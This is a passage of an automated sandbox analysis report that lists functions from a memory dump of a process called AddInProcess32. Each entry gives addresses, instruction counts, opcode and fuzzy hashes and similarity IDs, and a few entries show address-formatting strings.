                                              • Opcode Fuzzy Hash: 624e48567d5782de2bb756222a0de1bd5088d3a710e0618aa207011c652e9860
                                              • Instruction Fuzzy Hash: 71115775A02209ABDF19EFA8C940EAE7FB5FB48640F008099F90197380DB34EA11DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ADE016 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                              • Instruction ID: 94a9c74d7cfa1b2a758b4753e5e9cc88e3878cf708ccd3401db728cad109c371
                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                              • Instruction Fuzzy Hash: 56018F722409C09FE32A971DD998F267BE8EF45764F0E44A1F906CF691D738DC40C661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AB826B Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7cd21ea235144c5879b0c63562b10ee7f568e1725d42f9da6e0b6e05e0c88aec
                                              • Instruction ID: 31039a7574d114c9d2daabf47a95498d91b7b85cf8bc1da1f274bc40019eee38
                                              • Opcode Fuzzy Hash: 7cd21ea235144c5879b0c63562b10ee7f568e1725d42f9da6e0b6e05e0c88aec
                                              • Instruction Fuzzy Hash: 3A01DF32A00545ABCB18EB6ED9C19EE7BFCFF80210B1980A9DA01A7681DF70E801C690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC2582 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56db5839bfa1dd5f6f84b972192c69097c01ade389122c5633dcfbfee6f0fb5d
                                              • Instruction ID: d382c38f40a3866cb7f3dc548379449f72b351fb7f9989e73b596ba1459a654e
                                              • Opcode Fuzzy Hash: 56db5839bfa1dd5f6f84b972192c69097c01ade389122c5633dcfbfee6f0fb5d
                                              • Instruction Fuzzy Hash: D4F0F932B41A14B7C7319B5A8D40F577AB9EF94E90F05442DA60697600CA34DD05C6A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AEC073 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                              • Instruction ID: 1302d7fad1f13d0f4dfdeeca86aed54f676be7a27a8c35f5d95e47c4278dfb82
                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                              • Instruction Fuzzy Hash: 42F0C2B2A00A11ABD325CF4DDC40E57FBEADBD5A90F048128E509C7220EA31DD04CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ABC310 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                              • Instruction ID: 4a387b0ff4f12baebfd1f0de33a7b490e3788e15026aaa3f45e797a32c820fcb
                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                              • Instruction Fuzzy Hash: 18F04C73206AA39BD732176948C0FABE5AD8FD1A74F5A0036E2059B20DCA648D0152D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B961E5 Relevance: .0, Instructions: 41COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8985d374ffc140dc35624fa2c97b99dbf9ee2cfba92a705c022187b3b9583d15
                                              • Instruction ID: c1f0b4e1921d7284a326547c8504a2ea7290e8cce335b3c240c4bf990b9e45a1
                                              • Opcode Fuzzy Hash: 8985d374ffc140dc35624fa2c97b99dbf9ee2cfba92a705c022187b3b9583d15
                                              • Instruction Fuzzy Hash: 08018F71A012499FCF04DFA9D545EEEBBF8FF58710F1440AAE501A7280D774EA02CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B463C0 Relevance: .0, Instructions: 41COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                              • Instruction ID: 1b6c45505f2d70a17b1f31a0ab36de5117c8b6ae1da7eba25cfcc6df6cebbbb3
                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                              • Instruction Fuzzy Hash: FFF0F97220001DBFEF019F94DD80DAF7BBEEB59298B104165FA1192160D631DE21ABA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B4A4B0 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59b5a7795297cc00b2bca47b24dbdbef3dbc12eb4c35ecd3d7f705d319b29d2c
                                              • Instruction ID: 5ca744e8f384c6a35e35246961f918870b24db5e290f8e9cb0e8f97c6668b5ec
                                              • Opcode Fuzzy Hash: 59b5a7795297cc00b2bca47b24dbdbef3dbc12eb4c35ecd3d7f705d319b29d2c
                                              • Instruction Fuzzy Hash: E3018936100109ABCF129E94D940EDE3F66FB4C654F058141FE1966220C332D970EF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ABC0F0 Relevance: .0, Instructions: 39COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ff579b407965e0d4f89d286ef8990856ce666342e0e27ef31d3da0f7d2a715b
                                              • Instruction ID: 8672c846c9b3a9058221ced4e1995420f702003fedfc20f07e5013dcefde736b
                                              • Opcode Fuzzy Hash: 8ff579b407965e0d4f89d286ef8990856ce666342e0e27ef31d3da0f7d2a715b
                                              • Instruction Fuzzy Hash: 82F02B712143815BF7549759AC41FA2329DF7C0760F69806AE7099F2C6FA70DC4187A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AF656A Relevance: .0, Instructions: 39COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86486740525272a943ee256a500bd5a823da96d21644cfb797af6e092a7f91cd
                                              • Instruction ID: 7622294b9ea4b6c58dd098c5b165294ea699a58535fb8e460442fb2b9f7ad5fd
                                              • Opcode Fuzzy Hash: 86486740525272a943ee256a500bd5a823da96d21644cfb797af6e092a7f91cd
                                              • Instruction Fuzzy Hash: A70144B0240A859BE737977CCD8CF6537A4FB40B44F4846E4FB45DBAD6D768D4018611
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B6437C Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                              • Instruction ID: ef857f5ee4e113f1c1b8e1301632688f59beef38be19595787610fd7e40e26e3
                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                              • Instruction Fuzzy Hash: 72F02E35741D1347EB3DAA2DD590B2FAAAEDFB0D00B05057C9611CB640DF24DC00C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC47FB Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9095ebad70bbacb6bc9db9784f81d0671eb91b2fe2678f1722410b24cb20b8bc
                                              • Instruction ID: 78597d319d8538e50b1a2c0a9f78695e3a2165775ddffef7389d6a74c6de6653
                                              • Opcode Fuzzy Hash: 9095ebad70bbacb6bc9db9784f81d0671eb91b2fe2678f1722410b24cb20b8bc
                                              • Instruction Fuzzy Hash: 5BF0E2319167E19FEB33CB6CC574B23BBD49B08E30F08896ED58987502C724D880C758
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B80115 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07780cca888328921254676e44b812ba60ed541c2f8c378d86486d4607f0b5ff
                                              • Instruction ID: 769c73f0f6744c3e36840219ee6dce394f913f13fa3d4672384b8b9627535884
                                              • Opcode Fuzzy Hash: 07780cca888328921254676e44b812ba60ed541c2f8c378d86486d4607f0b5ff
                                              • Instruction Fuzzy Hash: 3EF0202641AA804ADF3A7B3C68D03E13B65E755A60F0910C9F9F16760AC7B4C887C324
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AFC5ED Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78b9c1d12471f0ca4b1a14b1b5296b9900a637ef9ec755fe65aff5e6b36b5c1d
                                              • Instruction ID: b42329b0a8cefab96f2aed04bd8182b7324730dd72d56572a324a0f4fc8f6903
                                              • Opcode Fuzzy Hash: 78b9c1d12471f0ca4b1a14b1b5296b9900a637ef9ec755fe65aff5e6b36b5c1d
                                              • Instruction Fuzzy Hash: 0CF059714196899FE7A2879EC104F117BE49B04B70F08742EF60283606C320E881C640
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B56030 Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                              • Instruction ID: 5ade6c25f4a884a9e254e5723986d576ec93391758853ba273e34df9ae94c553
                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                              • Instruction Fuzzy Hash: E4F0E572100204DFE3289F09D980F52B7F8EB09364F89C065EA098B161D379EC40CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B6678E Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                              • Instruction ID: f5d97725b42e2e51a5f8871855088a5df2fc4c44dbd43875615ec96b45ed7c46
                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                              • Instruction Fuzzy Hash: 88E0DF72A00510BFDB21A799CE01FABBFBCDBA4FA0F050094BA01E71D0E634DE00D690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC25E0 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 938bec90c49a8ea7d76bc62777447876737dde8b69866e1e560dca05dab8d887
                                              • Instruction ID: 8a2ef063776231af72002565a3f9218b62d27b153cba1c05c9a57550776a22ec
                                              • Opcode Fuzzy Hash: 938bec90c49a8ea7d76bc62777447876737dde8b69866e1e560dca05dab8d887
                                              • Instruction Fuzzy Hash: 81E0D872100A549BC722FF29DE15FDB7B9AEF64764F014519F11697190CB34AD10C7D8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B7A456 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                              • Instruction ID: 49171c6912aae13ac6a6897d02e7b796d60fe439286e86026b5e1f1c1424d92d
                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                              • Instruction Fuzzy Hash: 1BE01231010A52DFEB7A6F3ADA4CB56BAE1FF50711F188CADE1A6124B0C77598C5CA40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B44000 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                              • Instruction ID: 5f710d472e3fa72f85c12fbc7df6c1f7148c00054d1c2ae42c260cc361bf1835
                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                              • Instruction Fuzzy Hash: 48E0AE343002058BE719CF19C040B627BA6FFD9A10F28C0A8A9488F305EB32A8629A41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AB823B Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                              • Instruction ID: b0379603ef3ce3420be6525db2027991eb00d246fc811a8fd1e65f9a94c95149
                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                              • Instruction Fuzzy Hash: 8FE08C31000A61EEDB362F1ADD44B917AB9FF64B10F1948A9E182060A58778A885CA44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC2050 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd22125d2ebe5437b364460c592703cb9e5e0c98a7d9709df8eb843f9776ef5d
                                              • Instruction ID: b074492d9e9492440b2a8c52b7c5e1683581ab29a66d69b112ed13b4347aab66
                                              • Opcode Fuzzy Hash: dd22125d2ebe5437b364460c592703cb9e5e0c98a7d9709df8eb843f9776ef5d
                                              • Instruction Fuzzy Hash: 3DE0C2331005606BC711FF5DDE50F9A739EEFA4760F000125F15287690CB60AD00C798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AFE59C Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                              • Instruction ID: 86550ebbf3a5dc956e24c16cde518e780caf7968dfeb42342f71ec6bb2372275
                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                              • Instruction Fuzzy Hash: D6D0A932244A20ABDB32AA1CFC00FD333E8BB88720F060499B009C7050C3A0AC81CA84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ABA0E3 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                              • Instruction ID: c5939033112bdcf776ac9e1718ec981d5d2c4d2a6ed26fbc6333c6e25859c7cb
                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                              • Instruction Fuzzy Hash: 16D022323120B093CF2897556940FA36919EF80AA0F0A002D340A93800C0058C42C2E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AD02A0 Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                              • Instruction ID: 9e21b0bb142def0d9f2ea49e1984434829780c936bfcc69acc4852bebf19e408
                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                              • Instruction Fuzzy Hash: 29D09235612E80CFD61ACB0CC6A4B1533A4BB84A44F8104A0E542CBB22D638DA44CA00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AE0310 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                              • Instruction ID: 73416813e197b847fa5477bac2be390a209efb4e537e7da0262d923bbd4fdde3
                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                              • Instruction Fuzzy Hash: D7D01236200249EFCB01DF41C990D9A776AFBD8710F109019FD19076118A75ED62DA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B04340 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9552d9021ac9db4085b4fb73652eb295156dd5874278896235f522f7994db84f
                                              • Instruction ID: d56a3a798d26c9ba0cddfe4fec7eea33109cbd0412191a94ed7e0411ffe4ff30
                                              • Opcode Fuzzy Hash: 9552d9021ac9db4085b4fb73652eb295156dd5874278896235f522f7994db84f
                                              • Instruction Fuzzy Hash: A9900233655800139144715848845465005B7E1301B96C051E0424555CCB148A565361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 2c21d824662d346cd372bd8e7742001bfee065df8843ff47f263cc1a96f2364d
                                              • Instruction ID: 04bf4689ed40438a4dba96ca9472be5443e640c0e433c5d6c98ac7be6a15a8be
                                              • Opcode Fuzzy Hash: 2c21d824662d346cd372bd8e7742001bfee065df8843ff47f263cc1a96f2364d
                                              • Instruction Fuzzy Hash: A351F775A00645AEDF39DF9CC89097FBBF8EF44200B4484DAF5A6D7642E774EA408760
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: 711e84c40b15eefd8db085e50d02b84a7d5ab872cc7dd0e24b60e489b45ee204
                                              • Instruction ID: 4d0c11131b5d8f89f99d9e8c3ee2ea1fb5184da4bc3cc113171c9c78881b56bc
                                              • Opcode Fuzzy Hash: 711e84c40b15eefd8db085e50d02b84a7d5ab872cc7dd0e24b60e489b45ee204
                                              • Instruction Fuzzy Hash: ED21C77AE00159ABDB15DF7ADC40AFE7BF8FF54640F040196EA14D3600E730DA018BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 6aaa2e4bdb6bb9e7df4820896e7d4a28e0305a6cfe5c04251c0a2108cad8f465
                                              • Instruction ID: b98112cbbaf098b96a10447ab9e9945cbf296554f848a52e24c3d0524cd2d298
                                              • Opcode Fuzzy Hash: 6aaa2e4bdb6bb9e7df4820896e7d4a28e0305a6cfe5c04251c0a2108cad8f465
                                              • Instruction Fuzzy Hash: 35317872A002199FDB25DF2DDC80BEE77F8FF54610F4545D5E959E3240EB30AA448BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%